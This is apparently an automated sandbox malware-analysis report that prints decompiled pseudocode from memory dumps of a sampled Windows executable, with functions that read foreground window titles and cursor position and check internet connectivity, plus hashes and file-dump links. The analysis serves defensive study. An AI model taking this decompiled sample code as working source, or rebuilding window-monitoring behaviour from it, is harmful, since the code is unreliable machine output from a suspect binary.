0x00421ead
0x00421fd6
0x00421fd8
0x00421fdd
0x00421ed4
0x00421ed6
0x00421ef1
0x00421ef1
0x00421f09
0x00000000
0x00000000
0x00421f1b
0x00421f1d
0x00421f54
0x00421f58
0x00421f5e
0x00421f64
0x00421f68
0x00421f6a
0x00421f8e
0x00421f90
0x00421f90
0x00421f91
0x00421f94
0x00421fa3
0x00421fac
0x00421faf
0x00421fb2
0x00421fbb
0x00421fbe
0x00421f96
0x00421f9b
0x00421f9b
0x00421fc5
0x00421fd1
0x00000000
0x00421fd1
0x00421f6c
0x00421f6d
0x00421f8a
0x00000000
0x00421f8a
0x00421f6f
0x00421f70
0x00421f86
0x00000000
0x00421f72
0x00421f72
0x00421f73
0x00421f7f
0x00421f75
0x00421f76
0x00421f78
0x00421f78
0x00421f76
0x00000000
0x00421f73
0x00421f70
0x00421f21
0x00000000
0x00000000
0x00421f34
0x00421f4e
0x00000000
0x00000000
0x00000000
0x00421f4e
0x00421ed8
0x00421ede
0x00421ee5
0x00421ee6
0x00421eeb
0x00000000
0x00000000
0x00000000
0x00421eeb
0x00421ead
0x00421e8d
0x00421e6c

APIs

GetForegroundWindow.USER32(?), ref: 00421F0F
GetWindowTextA.USER32 ref: 00421F34
GetCursorPos.USER32(?), ref: 00421F58
GetWindowRect.USER32 ref: 00421F9B

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$CursorForegroundRectText
String ID:
API String ID: 1070175250-0
Opcode ID: 5528efbbe1ba25cd42c46d22160b12a4c1287dcdfa9ae6eb6141e9eeb9e1cd1e
Instruction ID: 0b4df81992a9ce422479d8a7ebe859f9af9475d767fc3954263ebad31d5fc2e0
Opcode Fuzzy Hash: 5528efbbe1ba25cd42c46d22160b12a4c1287dcdfa9ae6eb6141e9eeb9e1cd1e
Instruction Fuzzy Hash: 4E411431B043259ADF34CB64A994ABB77A5BB64320F96403FE526C32A0E73C5845874D

Uniqueness

Uniqueness Score: -1.00%

Function 00409B7F, Relevance: 6.1, APIs: 4, Instructions: 96
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00409B7F(void* __ecx) {
				struct HWND__* _t45;
				struct HWND__* _t47;
				intOrPtr* _t49;
				intOrPtr* _t51;
				void* _t52;
				intOrPtr* _t53;
				struct HWND__* _t54;
				void* _t76;
				intOrPtr* _t77;
				void* _t79;

				E0043E4E0(0x43f91c, _t79);
				_t76 = __ecx;
				 *((intOrPtr*)(_t79 - 0x1c)) = 0;
				SendMessageTimeoutA( *(_t79 + 0xc),  *(__ecx + 4), 0, 0, 2, 0x96, _t79 - 0x18);
				_t77 =  *((intOrPtr*)(_t76 + 0xc));
				if(_t77 == 0) {
					L14:
					_push(0x4550cc);
					L0043DE26();
					L15:
					 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
					return  *((intOrPtr*)(_t79 + 8));
				}
				 *(_t79 + 0xc) = 0;
				 *(_t79 - 4) = 0;
				_push(_t79 + 0xc);
				_push(0);
				_push(0x44a5c4);
				_push( *(_t79 - 0x18));
				if( *_t77() < 0) {
					L12:
					_t45 =  *(_t79 + 0xc);
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					if(_t45 != 0) {
						 *((intOrPtr*)(_t45->i + 8))(_t45);
					}
					goto L14;
				}
				 *((intOrPtr*)(_t79 - 0x10)) = 0;
				_t47 =  *(_t79 + 0xc);
				 *(_t79 - 4) = 1;
				 *((intOrPtr*)(_t47->i + 0x24))(_t47, _t79 - 0x10);
				_t49 =  *((intOrPtr*)(_t79 - 0x10));
				if(_t49 == 0) {
					goto L12;
				}
				 *((intOrPtr*)( *_t49 + 0xf0))(_t49, _t79 - 0x1c);
				_push( *((intOrPtr*)(_t79 - 0x1c)));
				_t51 = E00409C88(_t79 - 0x14);
				_t68 =  *_t51;
				 *(_t79 - 4) = 2;
				if( *_t51 == 0) {
					_t52 = 0;
				} else {
					_t52 = E00409D10(_t68);
				}
				_push(_t52);
				L0043DE26();
				_t70 =  *((intOrPtr*)(_t79 - 0x14));
				if( *((intOrPtr*)(_t79 - 0x14)) != 0) {
					E004096DD(_t70);
					 *((intOrPtr*)(_t79 - 0x14)) = 0;
				}
				_t53 =  *((intOrPtr*)(_t79 - 0x10));
				 *(_t79 - 4) = 0;
				if(_t53 != 0) {
					 *((intOrPtr*)( *_t53 + 8))(_t53);
				}
				_t54 =  *(_t79 + 0xc);
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				if(_t54 != 0) {
					 *((intOrPtr*)(_t54->i + 8))(_t54);
				}
				goto L15;
			}

0x00409b84
0x00409b9b
0x00409ba2
0x00409ba8
0x00409bae
0x00409bb3
0x00409c68
0x00409c6b
0x00409c70
0x00409c75
0x00409c7d
0x00409c85
0x00409c85
0x00409bb9
0x00409bbf
0x00409bc2
0x00409bc3
0x00409bc4
0x00409bc9
0x00409bd0
0x00409c57
0x00409c57
0x00409c5a
0x00409c60
0x00409c65
0x00409c65
0x00000000
0x00409c60
0x00409bd6
0x00409bd9
0x00409be3
0x00409be7
0x00409bea
0x00409bef
0x00000000
0x00000000
0x00409bf8
0x00409bfe
0x00409c04
0x00409c09
0x00409c0b
0x00409c11
0x00409c1a
0x00409c13
0x00409c13
0x00409c13
0x00409c1f
0x00409c20
0x00409c25
0x00409c2a
0x00409c2c
0x00409c31
0x00409c31
0x00409c34
0x00409c37
0x00409c3c
0x00409c41
0x00409c41
0x00409c44
0x00409c47
0x00409c4d
0x00409c52
0x00409c52
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00409B84
SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,00000002,00000096,?), ref: 00409BA8
#537.MFC42(004550CC), ref: 00409C70

Part of subcall function 00409C88: __EH_prolog.LIBCMT ref: 00409C8D
Part of subcall function 00409C88: #823.MFC42(0000000C,?,?,00409C09,?), ref: 00409C98

#537.MFC42(00000000,?), ref: 00409C20

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537H_prolog$#823MessageSendTimeout
String ID:
API String ID: 2797257802-0
Opcode ID: 85d35f7d2eb70984055e4c1ad253868b55dbbc38e514fd0d92ab0f76fddc8344
Instruction ID: de25aedf7ffac171624473ac2ffc7b1971f07a3ac4ce14d44d9307cc4de8349a
Opcode Fuzzy Hash: 85d35f7d2eb70984055e4c1ad253868b55dbbc38e514fd0d92ab0f76fddc8344
Instruction Fuzzy Hash: C8317A71E00249AFDF10DF94C8859AEBBB8EF49314F14857EF526AB292C7389E41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4AE, Relevance: 6.1, APIs: 4, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040F4AE(void* __ecx) {
				intOrPtr* _t38;
				void* _t39;
				int _t44;
				intOrPtr* _t50;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t76;
				struct HWND__* _t78;
				void* _t80;
				intOrPtr _t82;
				void* _t83;
				void* _t85;
				intOrPtr _t86;
				intOrPtr _t93;

				E0043E4E0(0x440304, _t83);
				_t86 = _t85 - 0x20;
				_t80 = __ecx;
				 *((char*)(_t83 - 0x2c)) =  *((intOrPtr*)(_t83 - 0xd));
				 *((intOrPtr*)(_t83 - 0x28)) = 0;
				 *((intOrPtr*)(_t83 - 0x24)) = 0;
				 *((intOrPtr*)(_t83 - 0x20)) = 0;
				_t38 =  *((intOrPtr*)(__ecx + 0x4c));
				 *(_t83 - 4) = 0;
				_t61 =  *_t38;
				 *((intOrPtr*)(_t83 - 0x14)) = _t61;
				if(_t61 != _t38) {
					do {
						_t78 =  *( *((intOrPtr*)(_t83 - 0x14)) + 0x10);
						_t44 = IsWindow(_t78);
						_t89 = _t44;
						if(_t44 == 0) {
							L3:
							E0041009F(_t83 - 0x2c,  *((intOrPtr*)(_t83 - 0x14)) + 0x10);
						} else {
							_push(0);
							_push(_t78);
							_t50 = E0040FB99(_t61, _t89);
							if(_t50 != 0) {
								 *((intOrPtr*)( *_t50 + 4))(_t83 - 0x18, _t78);
								 *(_t83 - 4) = 1;
								E0040F419(_t80,  *((intOrPtr*)(_t83 - 0x14)) + 0x10, _t83 - 0x18);
								_t18 = _t83 - 4;
								 *_t18 =  *(_t83 - 4) & 0x00000000;
								__eflags =  *_t18;
								L0043DD36();
							} else {
								goto L3;
							}
						}
						_t61 = _t83 - 0x14;
						E004107BC(_t61);
					} while ( *((intOrPtr*)(_t83 - 0x14)) !=  *((intOrPtr*)(_t80 + 0x4c)));
				}
				_t76 =  *((intOrPtr*)(_t83 - 0x28));
				if(_t76 !=  *((intOrPtr*)(_t83 - 0x24))) {
					_t59 = _t80 + 0x58;
					_t82 = _t80 + 0x48;
					_t93 = _t82;
					do {
						_push(_t61);
						 *((intOrPtr*)(_t83 - 0x1c)) = _t86;
						_push(_t59);
						L0043DD3C();
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						E0040F818(E0040FFA5(_t82, _t93), _t76);
						_t61 = _t82;
						E0041024D(_t61, _t76);
						_t76 = _t76 + 8;
					} while (_t76 !=  *((intOrPtr*)(_t83 - 0x24)));
				}
				 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
				_t39 = E0041007F();
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return _t39;
			}

0x0040f4b3
0x0040f4b8
0x0040f4c3
0x0040f4c5
0x0040f4c8
0x0040f4cb
0x0040f4ce
0x0040f4d1
0x0040f4d4
0x0040f4d7
0x0040f4db
0x0040f4de
0x0040f4e0
0x0040f4e3
0x0040f4e7
0x0040f4ed
0x0040f4ef
0x0040f4fe
0x0040f508
0x0040f4f1
0x0040f4f1
0x0040f4f2
0x0040f4f3
0x0040f4fc
0x0040f518
0x0040f527
0x0040f52c
0x0040f531
0x0040f531
0x0040f531
0x0040f538
0x00000000
0x00000000
0x00000000
0x0040f4fc
0x0040f53d
0x0040f540
0x0040f548
0x0040f4e0
0x0040f54d
0x0040f553
0x0040f555
0x0040f558
0x0040f558
0x0040f55b
0x0040f55b
0x0040f55e
0x0040f561
0x0040f562
0x0040f567
0x0040f575
0x0040f57b
0x0040f57d
0x0040f582
0x0040f585
0x0040f55b
0x0040f58a
0x0040f591
0x0040f59b
0x0040f5a4

APIs

__EH_prolog.LIBCMT ref: 0040F4B3
IsWindow.USER32(?), ref: 0040F4E7

Part of subcall function 0040FB99: __EH_prolog.LIBCMT ref: 0040FB9E
Part of subcall function 0040FB99: GetClassNameA.USER32(?,?,0000001E), ref: 0040FBBA

#800.MFC42(?,?), ref: 0040F538
#535.MFC42(?), ref: 0040F562

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: H_prolog$#535#800ClassNameWindow
String ID:
API String ID: 2630809952-0
Opcode ID: adcfeb2e5935d57d66b35dfd998693ff31a092868872cfd0774450f34623d9f9
Instruction ID: c7a5eb719800f1096699db1758fa7df6fe720e7a17cf794fa1aa7bb230c13b38
Opcode Fuzzy Hash: adcfeb2e5935d57d66b35dfd998693ff31a092868872cfd0774450f34623d9f9
Instruction Fuzzy Hash: 22318471E00109ABCF24DFA9D8915EEFBB5AF59304F14407EE005B3682DB38AE44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004032D4, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004032D4(intOrPtr* __ecx) {
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr* _t31;
				intOrPtr* _t41;
				intOrPtr _t42;
				void* _t45;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				E0043E4E0(E0043EE59, _t53);
				_t55 = _t54 - 0xcc;
				_t46 =  *((intOrPtr*)(_t53 + 8));
				L0043DE2C();
				L0042D180( *((intOrPtr*)( *__ecx + 0x18))(), _t46, _t46, _t46, _t45, _t48);
				_push(_t53 - 0xd8);
				_push(_t46);
				_t28 =  *((intOrPtr*)( *__ecx + 0x20))();
				_push(0x10);
				L0043DD54();
				_t41 = _t28;
				 *((intOrPtr*)(_t53 - 0x10)) = _t41;
				_t29 = 0;
				 *(_t53 - 4) = 0;
				if(_t41 != 0) {
					_push(_t53 - 0xd8);
					_push( *((intOrPtr*)( *_t46 + 0x14)));
					_t29 = E00403862(_t41);
				}
				 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t53 + 8)) = _t29;
				_push(0x44ac58);
				_push(_t53 + 8);
				L0043E528();
				_pop(_t50);
				_t31 =  *((intOrPtr*)(_t55 + 4));
				_t42 =  *((intOrPtr*)(_t55 + 8));
				_t51 =  *_t31;
				if(_t42 >= 0) {
					if( *((intOrPtr*)(_t51 + 0x68)) >= _t42) {
						_t31 =  *((intOrPtr*)( *_t41 + 0x18))(_t31);
					}
				} else {
					if( *((intOrPtr*)(_t51 + 0x6c)) == 0 ||  *((intOrPtr*)(_t51 + 0x68)) >= 3) {
						_t31 =  *((intOrPtr*)( *_t41 + 0x18))(_t31);
					}
					 *((intOrPtr*)(_t51 + 0x6c)) =  *((intOrPtr*)(_t51 + 0x6c)) + 1;
				}
				return _t31;
			}

0x004032d9
0x004032de
0x004032e6
0x004032f1
0x004032ff
0x0040330d
0x0040330e
0x00403311
0x00403314
0x00403316
0x0040331c
0x0040331e
0x00403321
0x00403325
0x00403328
0x00403330
0x00403333
0x00403336
0x00403336
0x0040333b
0x0040333f
0x00403345
0x0040334a
0x0040334b
0x00403351
0x00403352
0x00403356
0x0040335b
0x0040335f
0x0040337b
0x00403380
0x00403380
0x00403361
0x00403365
0x00403370
0x00403370
0x00403373
0x00403373
0x00403384

APIs

__EH_prolog.LIBCMT ref: 004032D9
#5628.MFC42(?), ref: 004032F1
#823.MFC42(00000010), ref: 00403316
_CxxThrowException.MSVCRT(?,0044AC58), ref: 0040334B

Part of subcall function 00403862: __EH_prolog.LIBCMT ref: 00403867
Part of subcall function 00403862: #350.MFC42(?,?,0040333B,?,?), ref: 00403873
Part of subcall function 00403862: #537.MFC42(?,?,?,0040333B,?,?), ref: 00403888

Memory Dump Source

Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: H_prolog$#350#537#5628#823ExceptionThrow
String ID:
API String ID: 282172954-0
Opcode ID: cabefa4462e5422f42059f1b699b75f7e15a5ddfa5b80f17bc54afd35fa9a96c
Instruction ID: b1d81f24237b11e251e811c1c7bde02530ea3576f55a002acc26808acaeb840d
Opcode Fuzzy Hash: cabefa4462e5422f42059f1b699b75f7e15a5ddfa5b80f17bc54afd35fa9a96c
Instruction Fuzzy Hash: 9521D431900210EFC714EF69C485D9ABBB8AF58315F20896FF445D7290DB34DA80CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00426573, Relevance: 6.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00426573(void* __ecx, void* __edx, long long __fp0) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __ebp;
				void* _t12;
				signed int _t17;
				void* _t24;
				void* _t28;
				void* _t29;
				long long* _t31;
				intOrPtr _t32;

				_t28 = __edx;
				_t32 =  *0x4558e8; // 0x0
				_t29 = __ecx;
				if(_t32 != 0) {
					return _t12;
				}
				 *0x4558e8 = 1;
				__imp__time( &_v8);
				__imp__difftime(_v8,  *((intOrPtr*)(__ecx + 0x17d8)));
				 *_t31 = __fp0;
				L0043E7A2();
				_v12 = 0;
				_pop(_t24);
				_t17 = ( *(__ecx + 0x1d24) * 0x3c +  *((intOrPtr*)(__ecx + 0x1d28))) * 0x3c;
				_v16 = _t17;
				asm("fild qword [ebp-0xc]");
				asm("fcompp");
				asm("fnstsw ax");
				asm("sahf");
				st0 = st1;
				if(_t17 < 0) {
					L11:
					 *0x4558e8 = 0;
					return _t17;
				}
				_t17 = E0042900A(_t24);
				if(_t17 == 0) {
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x17f9)) != 0) {
					_t27 =  *((intOrPtr*)(__ecx + 0x60));
					if( *((intOrPtr*)(__ecx + 0x60)) != 0) {
						_t17 = E0040F1E4(_t27);
					}
				}
				if( *((intOrPtr*)(_t29 + 0x1a1f)) == 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(_t29 + 0x16b8);
					_push(E004258FF);
					L0043E2BE();
					return _t17;
				} else {
					if( *((intOrPtr*)(_t29 + 0x17f8)) != 0) {
						E00427C70(_t29, _t28);
					}
					return E00426AFE(_t29);
				}
			}

0x00426573
0x0042657c
0x00426583
0x00426585
0x0042663c
0x0042663c
0x0042658e
0x00426599
0x004265a8
0x004265af
0x004265b2
0x004265bd
0x004265ca
0x004265cb
0x004265ce
0x004265d1
0x004265d6
0x004265d8
0x004265da
0x004265db
0x004265dd
0x00426633
0x00426633
0x00000000
0x00426633
0x004265df
0x004265e6
0x00000000
0x00000000
0x004265ee
0x004265f0
0x004265f5
0x004265f7
0x004265f7
0x004265f5
0x00426602
0x0042661c
0x0042661d
0x0042661e
0x00426625
0x00426626
0x00426627
0x0042662c
0x00000000
0x00426604
0x0042660a
0x0042660e
0x0042660e
0x00000000
0x00426615

APIs

time.MSVCRT ref: 00426599
difftime.MSVCRT ref: 004265A8
fabs.MSVCRT ref: 004265B2

Part of subcall function 0042900A: InternetGetConnectedState.WININET(?,00000000), ref: 0042901B

#1105.MFC42(004258FF,?,00000000,00000000,00000000,00000000), ref: 0042662C

Part of subcall function 0040F1E4: __EH_prolog.LIBCMT ref: 0040F1E9
Part of subcall function 0040F1E4: #535.MFC42(?), ref: 0040F210

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1105#535ConnectedH_prologInternetStatedifftimefabstime
String ID:
API String ID: 1470086928-0
Opcode ID: c97197a15f35d4e17010da718551a9441c2f0db098ec839fe5a46de018eb8240
Instruction ID: df294616d767ae5b2afb743143899f6124d99670aa7ca45b77c110608779e39c
Opcode Fuzzy Hash: c97197a15f35d4e17010da718551a9441c2f0db098ec839fe5a46de018eb8240
Instruction Fuzzy Hash: 0D110371A04664AEDB20ABA1A8914DBBBE8EB01304F95007FE45252281DA399C519F4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F419, Relevance: 6.1, APIs: 4, Instructions: 62
stringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040F419(void* __ecx, char _a4, char** _a8) {
				intOrPtr _v8;
				void* __ebp;
				char* _t25;
				int _t26;
				char** _t28;
				void* _t30;
				int _t35;
				intOrPtr* _t47;
				intOrPtr* _t50;
				void* _t51;
				intOrPtr _t52;

				_push(__ecx);
				_t30 = __ecx;
				if( *((intOrPtr*)( *_a8 - 8)) == 0) {
					L7:
					return 1;
				}
				E004102B2(__ecx + 0x48,  &_a4, _a4);
				_t50 = _a4 + 0x18;
				_t25 =  *(_t50 + 0x14);
				_t35 =  *(_t25 - 8);
				_t47 = _t50 + 0x14;
				if(_t35 > 0x28) {
					_t35 = 0x28;
				}
				_t26 = strncmp( *_a8, _t25, _t35);
				_t52 = _t51 + 0xc;
				if(_t26 != 0) {
					_push(_t35);
					_v8 = _t52;
					L0043DD3C();
					E0040F818(_t50, _t30 + 0x58);
					_push(_a8);
					L0043DFCA();
					 *(_t50 + 0x18) =  *(_t50 + 0x18) & 0x00000000;
				} else {
					_t28 = _a8;
					if( *((intOrPtr*)( *_t28 - 8)) >  *((intOrPtr*)( *_t47 - 8))) {
						_push(_t28);
						L0043DFCA();
					}
				}
				goto L7;
			}

0x0040f41c
0x0040f425
0x0040f42b
0x0040f4a5
0x0040f4ab
0x0040f4ab
0x0040f437
0x0040f43f
0x0040f442
0x0040f445
0x0040f448
0x0040f44e
0x0040f452
0x0040f452
0x0040f45b
0x0040f461
0x0040f466
0x0040f481
0x0040f487
0x0040f48b
0x0040f492
0x0040f497
0x0040f49c
0x0040f4a1
0x0040f468
0x0040f468
0x0040f475
0x0040f477
0x0040f47a
0x0040f47a
0x0040f475
0x00000000

APIs

strncmp.MSVCRT(?,?,00000000,?,?,?,?,00000000,?,?,0040F531,?,?), ref: 0040F45B
#858.MFC42(?), ref: 0040F47A
#535.MFC42 ref: 0040F48B

Part of subcall function 0040F818: __EH_prolog.LIBCMT ref: 0040F81D
Part of subcall function 0040F818: #800.MFC42(?,?,?,00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 0040FB78

#858.MFC42(?), ref: 0040F49C

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
